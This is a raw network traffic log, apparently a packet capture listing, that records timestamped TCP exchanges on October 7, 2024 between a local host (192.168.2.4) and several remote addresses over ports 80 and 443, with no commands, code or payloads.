                                                                                                                                      Oct 7, 2024 03:23:14.341470003 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.341490030 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.341511965 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.341541052 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.342246056 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.342273951 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.342288971 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.342324018 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.344091892 CEST49850443192.168.2.4142.250.185.142
                                                                                                                                      Oct 7, 2024 03:23:14.344104052 CEST44349850142.250.185.142192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.344414949 CEST49850443192.168.2.4142.250.185.142
                                                                                                                                      Oct 7, 2024 03:23:14.344742060 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.344808102 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.344814062 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.344856024 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.344957113 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.344999075 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.345139027 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.345180035 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.345328093 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.345370054 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.348596096 CEST49850443192.168.2.4142.250.185.142
                                                                                                                                      Oct 7, 2024 03:23:14.348614931 CEST44349850142.250.185.142192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.353300095 CEST49837443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:14.353310108 CEST4434983713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.354012012 CEST49837443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:14.354017973 CEST4434983713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.430653095 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.430670977 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.430686951 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.430701971 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.430736065 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.430736065 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.430813074 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.430840969 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.430856943 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.430857897 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.430876017 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.430876970 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.430896044 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.430911064 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.431034088 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.431058884 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.431071997 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.431073904 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.431091070 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.431097031 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.431107044 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.431108952 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.431123018 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.431139946 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.431441069 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.431480885 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.431507111 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.431523085 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.431539059 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.431545019 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.431555033 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.431555986 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.431576967 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.431587934 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.431957006 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.431972980 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.431997061 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.432008028 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.432023048 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.432027102 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.432038069 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.432039022 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.432055950 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.432060003 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.432077885 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.432086945 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.435544014 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.435564041 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.435589075 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.435604095 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.435825109 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.435863018 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.435954094 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.435971022 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.435987949 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.435995102 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436006069 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436021090 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436028004 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436039925 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436044931 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436055899 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436069965 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436074972 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436089039 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436110973 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436609030 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436628103 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436644077 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436657906 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436672926 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436688900 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436773062 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436789989 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436809063 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436811924 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436821938 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436825991 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436842918 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436846972 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436857939 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436860085 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.436877012 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.436897039 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.437531948 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.437546968 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.437565088 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.437582016 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.437583923 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.437597036 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.437616110 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.437650919 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.451086998 CEST4434983713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.451278925 CEST4434983713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.451344967 CEST49837443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:14.451389074 CEST49837443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:14.451389074 CEST49837443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:14.451405048 CEST4434983713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.451412916 CEST4434983713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.456964016 CEST49851443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:14.456984997 CEST4434985113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.457075119 CEST49851443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:14.465063095 CEST49851443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:14.465076923 CEST4434985113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555303097 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555339098 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555358887 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555375099 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555408955 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555412054 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555425882 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555442095 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555459023 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555474997 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555504084 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555521011 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555536985 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555567026 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555583954 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555600882 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555617094 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555624008 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555624008 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555624008 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555624008 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555624008 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555624962 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555624962 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555624962 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555636883 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555644989 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555644989 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555644989 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555644989 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555656910 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555658102 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555675983 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555680037 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555694103 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555705070 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555711031 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555728912 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.555730104 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555730104 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555756092 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.555775881 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556149960 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556166887 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556184053 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556195974 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556215048 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556226969 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556241989 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556257963 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556278944 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556284904 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556289911 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556303024 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556325912 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556330919 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556334972 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556348085 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556365013 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556370020 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556379080 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556381941 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556401014 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556402922 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556411982 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556416035 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556448936 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556899071 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556915045 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556932926 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.556961060 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556984901 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.556993961 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557010889 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557025909 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557050943 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557055950 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557070017 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557075024 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557091951 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557094097 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557106018 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557110071 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557128906 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557128906 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557147980 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557152987 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557163954 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557168007 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557193995 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557203054 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557650089 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557677984 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557696104 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557712078 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557713032 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557725906 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557733059 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557745934 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557755947 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557760000 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557776928 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557776928 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557794094 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557797909 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557807922 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557811975 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557832003 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557832956 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557843924 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557864904 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557877064 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557893038 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557909012 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557918072 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557925940 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557939053 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557943106 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557946920 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557960033 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.557966948 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557976961 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.557996988 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.560555935 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560574055 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560592890 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560610056 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.560610056 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560631037 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560636044 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.560657024 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.560676098 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.560679913 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560698032 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560714006 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560723066 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.560733080 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560735941 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.560744047 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.560760021 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560775995 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560782909 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.560791016 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.560791969 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560807943 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.560810089 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.560828924 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.560847044 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.642033100 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642060995 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642088890 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642113924 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642131090 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642132044 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.642153978 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.642163038 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642170906 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.642179966 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642194986 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642205000 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.642210960 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642227888 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642231941 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.642252922 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.642252922 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642270088 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642277956 CEST4984280192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:14.642287016 CEST8049842185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.642293930 CEST4984280192.168.2.4185.215.113.103
